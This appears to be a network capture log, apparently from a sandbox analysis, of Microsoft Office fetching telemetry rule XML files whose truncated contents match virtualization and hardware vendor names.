                                                                                                                  x-azure-ref: 20241114T140056Z-16547b76f7flf9g6hC1DFWmcx8000000095000000000m013
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC | 485 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  105 | 192.168.2.4 | 49876 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:56 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 411
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B989AF051"
                                                                                                                  x-ms-request-id: dfccd5b2-501e-00a3-0f60-35c0f2000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-r178fb8d765ljg7ghC1DFWfk4c00000002eg000000008evw
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC | 411 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  106 | 192.168.2.4 | 49878 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:56 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                  ETag: "0x8DC582BB556A907"
                                                                                                                  x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-16547b76f7fknvdnhC1DFWxnys0000000kv0000000004avk
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  107 | 192.168.2.4 | 49880 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:57 UTC | 192 | OUT | GET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 502
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                  ETag: "0x8DC582BB6A0D312"
                                                                                                                  x-ms-request-id: 53ebd79e-c01e-0046-4ea1-342db9000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-r178fb8d765w8fzdhC1DFW8ep400000002n000000000570n
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC | 502 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  108 | 192.168.2.4 | 49881 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:57 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 407
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                  ETag: "0x8DC582B9D30478D"
                                                                                                                  x-ms-request-id: e8b169fe-001e-008d-0840-36d91e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-1749fc9bdbdqhv2phC1DFWvd3000000002e000000000knkb
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  109 | 192.168.2.4 | 49882 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:57 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 474
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                  ETag: "0x8DC582BB3F48DAE"
                                                                                                                  x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-16547b76f7fkj7j4hC1DFW0a9g0000000ksg00000000630k
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  110 | 192.168.2.4 | 49884 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:57 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 408
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                  ETag: "0x8DC582BB9B6040B"
                                                                                                                  x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-16547b76f7fr4g8xhC1DFW9cqc0000000k0g000000001e2n
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  111 | 192.168.2.4 | 49883 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:57 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 469
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                  ETag: "0x8DC582BB3CAEBB8"
                                                                                                                  x-ms-request-id: da73b1ea-a01e-0070-5573-35573b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-16547b76f7fkcrm9hC1DFWxdag0000000kvg000000009fhh
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  112 | 192.168.2.4 | 49888 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:58 UTC | 192 | OUT | GET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 416
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                  ETag: "0x8DC582BB5284CCE"
                                                                                                                  x-ms-request-id: 50fcf232-201e-0085-635e-3534e3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-r178fb8d765z9wvrhC1DFW1a0s00000000r000000000bmk5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC | 416 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  113 | 192.168.2.4 | 49889 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:58 UTC | 192 | OUT | GET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                  ETag: "0x8DC582B91EAD002"
                                                                                                                  x-ms-request-id: a2911e08-e01e-003c-21a2-34c70b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-r178fb8d765th6bkhC1DFWr7h000000002s0000000009ea9
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC | 472 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  114 | 192.168.2.4 | 49890 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:58 UTC | 192 | OUT | GET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 432
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                  ETag: "0x8DC582BAABA2A10"
                                                                                                                  x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-16547b76f7fknvdnhC1DFWxnys0000000kw0000000000qsw
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC | 432 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  115 | 192.168.2.4 | 49891 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:58 UTC | 192 | OUT | GET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 475
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                  ETag: "0x8DC582BBA740822"
                                                                                                                  x-ms-request-id: 1138df84-701e-0097-5940-36b8c1000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-1749fc9bdbdlfqrwhC1DFWmyg800000000qg000000006gd6
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC | 475 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  116 | 192.168.2.4 | 49892 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:58 UTC | 192 | OUT | GET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                  ETag: "0x8DC582BB464F255"
                                                                                                                  x-ms-request-id: f6e8dc5a-601e-0002-3da0-34a786000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-1749fc9bdbddrtrhhC1DFWsq8000000002m000000000ctmp
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC | 427 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  117 | 192.168.2.4 | 49895 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:58 UTC | 192 | OUT | GET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 474
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                  ETag: "0x8DC582BA4037B0D"
                                                                                                                  x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-16547b76f7fr4g8xhC1DFW9cqc0000000k0g000000001e5g
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC | 474 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  118 | 192.168.2.4 | 49896 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:59 UTC | 192 | OUT | GET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                  ETag: "0x8DC582BA6CF78C8"
                                                                                                                  x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7f9bs6dhC1DFWt3rg0000000kpg00000000d4wc
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC | 419 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  119 | 192.168.2.4 | 49897 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:59 UTC | 192 | OUT | GET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B984BF177"
                                                                                                                  x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7f8dwtrhC1DFWd1zn0000000kug00000000bk59
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC | 472 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  120 | 192.168.2.4 | 49898 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:59 UTC | 192 | OUT | GET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 405
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                  ETag: "0x8DC582B942B6AFF"
                                                                                                                  x-ms-request-id: e1e5caf7-d01e-00ad-6fa7-34e942000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-r178fb8d765mjvjchC1DFWhkyn00000002hg0000000050rn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC | 405 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  121 | 192.168.2.4 | 49899 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:59 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                  ETag: "0x8DC582BBA642BF4"
                                                                                                                  x-ms-request-id: 46cd4d21-b01e-0097-7b90-364f33000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7fdtmzhhC1DFW6zhc00000007q0000000004cat
                                                                                                                  x-fd-int-roxy-purgeid: 0
